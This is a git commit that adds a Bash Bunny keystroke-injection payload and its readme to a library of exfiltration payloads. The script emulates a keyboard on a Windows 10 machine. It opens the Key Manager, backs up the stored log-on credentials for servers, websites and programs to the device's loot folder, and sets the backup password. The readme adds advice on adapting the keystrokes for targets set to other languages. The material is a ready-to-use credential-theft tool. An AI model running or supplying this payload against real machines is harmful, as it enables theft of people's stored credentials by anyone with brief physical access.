New Payload - KeyManger Backup (#517)

* New Payload - KeyManger Backup * Update Desc
2022-04-20 20:04:44 +01:00 · 2022-04-20 20:04:44 +01:00 · 3f41494153
parent 1eef8dc006
commit 3f41494153
2 changed files with 96 additions and 0 deletions
--- a/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt
+++ b/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt
@ -0,0 +1,66 @@
+#!/bin/bash
+# Title:        KeyManager Backup
+# Description:  Create a backup of the key manager which stores log-on credentials for servers, websites and programs
+# Author:       Cribbit
+# Version:      1.0
+# Category:     Exfiltration
+# Target on:    Windows 10
+# Attackmodes:  HID & STORAGE 
+# Extensions:   Run
+# Props:        Paranoid Ninja
+
+####################### Config #######################
+password=lamepassword
+##################### End Config #####################
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+
+LED ATTACK
+
+QUACK DELAY 200
+RUN WIN "rundll32 keymgr.dll, KRShowKeyMgr"
+QUACK DELAY 200
+# button: Backup up...
+QUACK ALT b
+QUACK DELAY 200
+# button: Browse...
+QUACK ALT b
+# file name
+QUACK STRING "backup"
+# select task bar
+QUACK ALT d
+QUACK DELAY 200
+# look for bunny
+QUACK STRING "BashBunny"
+QUACK DELAY 600
+#select drive
+QUACK DOWNARROW
+# add loot folder
+QUACK STRING "/loot"
+QUACK ENTER
+QUACK DELAY 200
+# button: Save
+QUACK ALT s
+QUACK DELAY 200
+# button: Next
+QUACK ALT n
+QUACK DELAY 200
+# note: keycroc you can uses CTRL-ALT-DELETE
+QUACK CTRL-ALT DELETE
+QUACK DELAY 200
+QUACK STRING "$password"
+QUACK TAB
+QUACK STRING "$password"
+# button: Next
+QUACK ALT n
+QUACK DELAY 300
+# button: Finish
+QUACK ALT f
+QUACK DELAY 200
+# button: Close
+QUACK ALT c
+
+LED FINISH
+
--- a/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md
+++ b/payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md
@ -0,0 +1,30 @@
+# KeyManager Backup
+- Author: Cribbit
+- Version: 1.0
+- Tested on: Windows 10
+- Category: Exfiltration
+- Attackmode: HID & STORAGE
+- Extensions: Run
+- Props: Paranoid Ninja https://twitter.com/NinjaParanoid/status/1516442028963659777
+
+## Description
+Create a backup of the key manager which stores log-on credentials for servers, websites and programs.
+
+## Change Log
+| Version | Changes         |
+| ------- | --------------- |
+| 1.0     | Initial release |
+
+## Config
+set the password for the backup by setting the `password` variable
+
+## Notes
+This payload relays heavily on button shortcuts this mean it is very target to an English version of windows. 
+If you are targeting a different language, you will need to change the letter after the ALT key to the corresponding letter for the button.
+
+## Colours
+| Status   | Colour                        | Description                 |
+| -------- | ----------------------------- | --------------------------- |
+| SETUP    | Magenta solid                 | Setting attack mode         |
+| ATTACK   | Yellow single blink           | Injecting script            |
+| FINISHED | Green blink followed by SOLID | Injection finished          |